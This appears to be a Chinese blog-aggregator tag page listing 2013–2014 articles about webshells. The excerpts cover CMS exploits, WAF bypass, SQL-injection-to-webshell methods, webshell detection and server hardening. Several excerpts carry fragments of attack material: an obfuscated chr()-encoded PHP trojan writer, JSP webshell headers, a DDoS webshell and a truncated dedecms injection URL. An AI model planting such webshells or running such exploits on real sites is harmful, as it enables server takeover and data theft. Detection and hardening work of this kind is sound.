WebShell

轻取帝国CMS管理员密码

“帝国”CMS曝出的漏洞能够让黑客在1分钟内拿到管理员的账户密码,之后更能轻松获取webshell。下面让我们一起来对“帝国”CMS进行一次入侵检测。
絮飘·2014-07-19 11:16

教你如何绕过安全狗(safedog)

最近经过一些研究,发现安全狗的一些防护功能,例如SQL注入、文件上传、防webshell等都可以被绕过,下面为大家一一介绍。
佚名·2014-07-17 15:12

msf 之 webshell 提权

msf来提权(因为msf里边有个meterpreter很强大^_^)Metasploit拥有msfpayload和msfencode这两个工具,这两个工具不但可以生成exe型后门,一可以生成网页脚本类型的webshell
mik3y·2014-07-16 16:00

用搜索神器Everything定位Webshell木马后门

Everything是速度最快的文件名搜索软件。其速度之快令人震惊,百G硬盘几十万个文件,可以在几秒钟之内完成索引;文件名搜索瞬间呈现结果。它小巧免费,支持中文,支持正则表达式,可以通过HTTP或FTP分享搜索结果。Everything搜索工具的最大优点是速度。其速度不是快,是极快;用户不是满意,而是震惊。因为Everything的索引无需逐一扫描硬盘文件,而是直接读取NTFS文件系统的USN日志
_zero·2014-06-25 12:00

用搜索神器Everything定位Webshell木马后门

Everything是速度最快的文件名搜索软件。其速度之快令人震惊,百G硬盘几十万个文件,可以在几秒钟之内完成索引;文件名搜索瞬间呈现结果。它小巧免费,支持中文,支持正则表达式,可以通过HTTP或FTP分享搜索结果。Everything搜索工具的最大优点是速度。其速度不是快,是极快;用户不是满意,而是震惊。因为Everything的索引无需逐一扫描硬盘文件,而是直接读取NTFS文件系统的USN日志
_zero·2014-06-25 04:00

Web安全之SQL注入攻击技巧与防范

Web安全简史在Web1.0时代,人们更多是关注服务器端动态脚本语言的安全问题,比如将一个可执行脚本(俗称Webshell)通过脚本语言的漏洞上传到服务器上,从而获得服务器权限。
潘良虎·2014-06-22 11:03

jspwebshell

<%@ page contentType="text/html; charset=UTF-8" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" e
haoningabc·2014-06-20 12:00

jspwebshell

<%@ page contentType="text/html; charset=UTF-8" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" e
haoningabc·2014-06-20 12:00

服务器安全狗linux版 V2.4 发布 增加网页木马扫描

linuxV2.4正式版终于发布,版本号为V2.4.08649,服务器安全狗linuxV2.4版主要是增加安全扫描功能,其中便包括网马扫描,能够准确扫描出当前系统的可疑病毒文件,可在Linux服务器上扫描WebShell
小猪猪的风·2014-06-12 18:00

中国菜刀的功能介绍和使用方法(黑站利器与后门利用测试工具)

中国菜刀,一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了。
佚名·2014-05-09 14:07

Nginx+PHP防webshell跨站,跨目录的安全设置,多种方式,适合php5.3以上

Nginx+PHP防webshell跨站,跨目录的安全设置,多种方式,适合php5.3以上方法1:在Nginx配配置文件server{}中加入:fastcgi_paramPHP_ADMIN_VALUE“
李焱心·2014-04-15 15:57

Nginx+PHP防webshell跨站,跨目录的安全设置,多种方式,适合php5.3以上

Nginx+PHP防webshell跨站,跨目录的安全设置,多种方式,适合php5.3以上方法1:在Nginx配配置文件server{}中加入:fastcgi_paramPHP_ADMIN_VALUE“
李焱心·2014-04-15 15:57

删除lpt7.xxx.asp,com5.xxx.asp文件

删除lpt7.xxx.asp,com5.xxx.asp文件   利用系统保留文件名创建无法删除的webshell,Windows下不能够以下面这些字样来命名文件/文件夹:aux|prn|con|nul|
李焱心·2014-04-15 14:35

DVWA之从SQL注入到写入webshell

这篇文章谈论简单的技术,利用sql注入(SQLi)漏洞,并获得一个webshell,所有的演示都是用DVWA(渗透测试演练系统)。
DevilRex119·2014-04-11 19:49

后台拿webshell的常用方法总结

时间:2014-04-1611:22来源:阳光在线下载标签:js6899.com一、直接上传获得webshell这种对php和jsp的一些程序比较常见,MolyXBOARD就是其中一例,直接在心情图标管理上传
60863·2014-04-10 19:39

linux查找webshell

公司网站被挂马,如何快速的查找出来通过grep查找webshell我们可以用grep命令搜索文件中存在shell_exec函数的地方,如下:grep-Rn“shell_exec*(”/var/www查找其它危险函数
屋脊之上·2014-03-24 13:41

linux查找webshell

公司网站被挂马,如何快速的查找出来通过grep查找webshell我们可以用grep命令搜索文件中存在shell_exec函数的地方,如下:grep-Rn“shell_exec*(”/var/www查找其它危险函数
屋脊之上·2014-03-24 13:41

Google Hacking 的实现以及应用

前言googlehacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的webshell什么的
空云万里晴·2014-03-15 23:00

教你如何通过Mysql弱口令得到系统权限

很早网上就有了用mysql弱口令得到webshell教程,但是这次我要说的不是得到webshell,而是直接得到系统权限,看清楚了,是“直接”得到!
i_yo·2014-03-07 19:33

Tomcat启动权限

使用Root权限启动Tomcat会带来很多的安全问题,尤其是在攻击者获得Webshell之后危害就更大了。这就要求启动Tomcat最好是采用一般的用户权限。
梦朝思夕·2014-03-07 12:55

Tomcat启动权限

使用Root权限启动Tomcat会带来很多的安全问题,尤其是在***者获得Webshell之后危害就更大了。这就要求启动Tomcat最好是采用一般的用户权限。
梦朝思夕·2014-03-07 12:55

浅谈MySQL导出一句话木马拿WebShell的方法-只需要一句SQL

昨天看一篇文章中说到MySQL导出一句话木马拿WebShell的方法。
Gs_Yu·2014-02-28 17:09

web应用防火墙 – 安全伞18.5.1免费版本发布

能有效扫描各种WebShell,同时也可以抵御各种Web攻击。
0000000·2014-02-27 05:00

上海中兴ZXHN F420光猫破解教程(适用于3.3版)

,各种破解方法都失效了,现在就教大家怎么用TTL连接开启F420被屏蔽的Telnet,TTL连接上后可用sendcmd命令修改限制连接数,关闭tr69远程,开启telnetservice等(就是以前的webshell
yueyizx·2014-02-09 14:37

花一周的空余时间写一个jsp的webshell

[color=red]请勿用于网站攻击等非法行为,造成的后果一律与本人无关。[/color]其实本来想好好搞的,结果写了一半发现有更好更全的,还是不要重复造轮子了。连美化都没有美化:cry:基本功能:1、文件管理(浏览,删除,编辑,上传下载,重命名,新建目录和文件等)2、数据库连接3、端口扫描4、命令执行感觉比较好的地方:1、端口扫描采用了多线程的方式,扫描速度比较快2、文件编辑考虑到了不同编码的
dingodingy·2014-01-14 15:33

花一周的空余时间写一个jsp的webshell

阅读更多请勿用于网站攻击等非法行为,造成的后果一律与本人无关。其实本来想好好搞的,结果写了一半发现有更好更全的,还是不要重复造轮子了。连美化都没有美化基本功能:1、文件管理(浏览,删除,编辑,上传下载,重命名,新建目录和文件等)2、数据库连接3、端口扫描4、命令执行感觉比较好的地方:1、端口扫描采用了多线程的方式,扫描速度比较快2、文件编辑考虑到了不同编码的问题3、所有的操作都采用了post的方式
dingody·2014-01-14 15:00

花一周的空余时间写一个jsp的webshell

请勿用于网站攻击等非法行为,造成的后果一律与本人无关。其实本来想好好搞的,结果写了一半发现有更好更全的,还是不要重复造轮子了。连美化都没有美化基本功能: 1、文件管理(浏览,删除,编辑,上传下载,重命名,新建目录和文件等)2、数据库连接3、端口扫描4、命令执行感觉比较好的地方: 1、端口扫描采用了多线程的方式,扫描速度比较快 2、文件编辑考虑到了不同编码的问题 3、所有的操作都采用了post的方式
dingody·2014-01-14 15:00

花一周的空余时间写一个jsp的webshell

阅读更多请勿用于网站攻击等非法行为,造成的后果一律与本人无关。其实本来想好好搞的,结果写了一半发现有更好更全的,还是不要重复造轮子了。连美化都没有美化基本功能:1、文件管理(浏览,删除,编辑,上传下载,重命名,新建目录和文件等)2、数据库连接3、端口扫描4、命令执行感觉比较好的地方:1、端口扫描采用了多线程的方式,扫描速度比较快2、文件编辑考虑到了不同编码的问题3、所有的操作都采用了post的方式
dingody·2014-01-14 15:00

服务器一些安全问题

一般就是Web服务器运行用户)对Web目录是没有写权限的(除了缓存目录),而为了安全一般都用disable_functions在php.ini里禁用了PHP执行Shell的函数(也就无法通过运行PHPWebShell
pureboys·2013-12-19 16:00

web服务器的php安全设置

一般就是Web服务器运行用户)对Web目录是没有写权限的(除了缓存目录),而为了安全一般都用disable_functions在php.ini里禁用了PHP执行Shell的函数(也就无法通过运行PHPWebShell
seared2008·2013-12-19 14:00

phpshell_ddos攻击型webshell

从一个被中招的老兄的服务器中找到一个php后门,看了一下内容,原来webshell可以这样用此乃cc模式:syn模式"; $max_time=$time+$exec_time; while(1){ $packets
阿唐·2013-12-16 23:00

JEECMS编辑漏洞及随便拿webshell,啊哈哈

JEECMS是基于java技术开发,继承其强大、稳定、安全、高效、跨平台等多方面的优点・采用SpringMVC3+Spring3+Hibernate3+Freemarker主流技术架构安全性做得非常变态,当网站安装完成后就不再允许执行任何目录下的jsp文件了(web.xml配置了过滤器禁止了很多种动态脚本)。2.x后台:login/Jeecms.do3.x后台:jeeadmin/jeecms/in
a120565444·2013-12-10 22:46

PHP中代码编码解码的一些问题总结(base64+gzinflate|gzdeflate+str_rot13)

在github上下了个PHP的webshell,代码如下图中间省略几百行代码......一开始没有头绪,以为是采用了PHP官方的ZendGuard加密算法,所以会自动解码百度了下发现其实不然,用ZendGuard
Gs_Yu·2013-12-10 13:58

SQL 注入经验

并确定是否存在SQL注入漏洞2.判断Web系统的数据库类型3.判断数据库中表及相应字段的结构4.构造注入语句,得到表中数据内容5.查找网站管理员后台,用得到的管理员账号和密码登录6.结合其他漏洞,想办法上传一个Webshell7
xmusun·2013-12-02 20:45

ASP的webshell在服务器上的默认权限是什么

2009-09-2101:47zyj94 | 分类:其他编程语言 | 浏览890次是users权限还是gusest权限或者是什么,我测试过感觉这两个权限都好像不是分享到:2009-09-2517:18提问者采纳默认是iisuser还有一个帐户是启动iis的,你可以在计算机用户中查看到,具体什么权限,你可以看iis_user是属于哪个组的,这个组有什么权限
p656456564545·2013-11-18 18:00

[通杀]dedecms plus/search.php 注入漏洞利用EXP

我一般是这样测试的:提交 webshell.cc/plus/search.php?keyword=as&typeArr[uNi
p656456564545·2013-11-14 09:00

【转】webshell中的不死僵尸和隐藏后门的原理以及删除

主要是利用系统保留文件名创建无法删除的webshell来隐藏后门。
yiyefangzhou24·2013-10-29 09:00

记一次入侵

2.残忍的拿下其webshell,呵呵呵呵呵呵呵呵。。。。。3.唉,不对,他的外网IP和主站根本不在同一网站,世界在旋转,那我忙活这么久,怎么。。。。
愚者愉也·2013-10-19 20:13

网站安全狗V3.1版 新增数据包外发拦截功能

网站安全狗是一款集WebShell病毒查杀和WAF为一体的网站安全防护软件,采用基于WEB容器插件式的技术来实现安全防护。
小猪猪的风·2013-10-14 18:00

tunna工具使用实例

原理:就是个HTTPtunneling工具可以看出该工具先使用proxy.py监听本地一个端口,然后连接部署在远程WEB的webshell,远端的webshell会把端口转发请求转发到本地或者本地内网远程的主机
jzking121·2013-10-09 22:32

JS Hijacking 利用

1.用处补充两个利用场景:(1),追踪那群黑客,对于那些没用虚拟机或者公私未严格分离的黑客,只需要在webshell里嵌入js即可完成定位,这也是JC的常用手法哦~(2),定位管理员,不管在内网渗透还是在公网渗透
jzking121·2013-10-09 22:59

通过mysql获取php webshell

   在获得目标网站的mysql权限之后,可进一步获取网站webshell,此方法前提①mysql权限是root,②获取到了网站的绝对路径。
youthflies·2013-09-28 00:00

关于怎样提权的小帖子

http://www.jb51.net/hack/21297.htmlhttp://hi.baidu.com/happy8d/item/6839edc2ba343953ac00efcchttp://www.webshell.cc
wangyi_lin·2013-09-27 12:00

WebShell的检测技术

一、Webshell的常见植入方法 -启明星辰 LeyloTrentWebShell攻击是常见的用来控制Web服务器的攻击方法,WebShell文件通常是可执行的脚本文件,例如asp,php,jsp文件
niuyisheng·2013-09-22 11:00

常见 Webshell 的检测方法及检测绕过思路

Webshell的因素我们从一个最简单的webshell结构可以看出其基本结构:“”从目前被公布的一句话webshell来看,基本都符合这个结构,即shell的实现需要两步:数据的传递、执行所传递的数据
niuyisheng·2013-09-22 11:00

企业运维安全

检测webshell不能只是简单的查杀,而该把这个当作一个长期任务来做,防御webshell不能单单从”行为”上去判断,前期需要做的工作还有很多,我从企业的全局防御来说说如何从架构上防御webshell
屋脊之上·2013-08-28 15:41

企业运维安全

     检测webshell不能只是简单的查杀,而该把这个当作一个长期任务来做,防御webshell不能单单从”行为”上去判断,前期需要做的工作还有很多,我从企业的全局防御来说说如何从架构上防御webshell
屋脊之上·2013-08-28 15:41

linux查找webshell

首先认识一下小马,一般大马容易暴露,骇客都会留一手,把小马加入正常PHP文件里面//密码为a,使用中国菜刀连接隐藏很深的小马fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(
gaolongquan·2013-08-21 18:00

浅谈服务器被黑后的检查工作流程

1.服务器被拿下最高权限即系统权限一般为了拿系统权限,基本肯定不会干什么好事,服务器的数据基本都会被打包走,因为系统权限是最高权限能干的事多了,我就不说黑阔们都用着权限干嘛了,你们懂的2.服务器被拿下webshell
jingshengsun888·2013-08-19 13:56

JSP的WebShell

ins=newHashMap(); privatestaticclassMyRequestextendsHttpServletRequestWrapper{ publicMyRequest(HttpServletRequestreq){ super(req); } publicStringgetParameter(Stringn
kanlianhui·2013-07-26 14:00
上一页 47 48 49 50 51 52 53 54 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他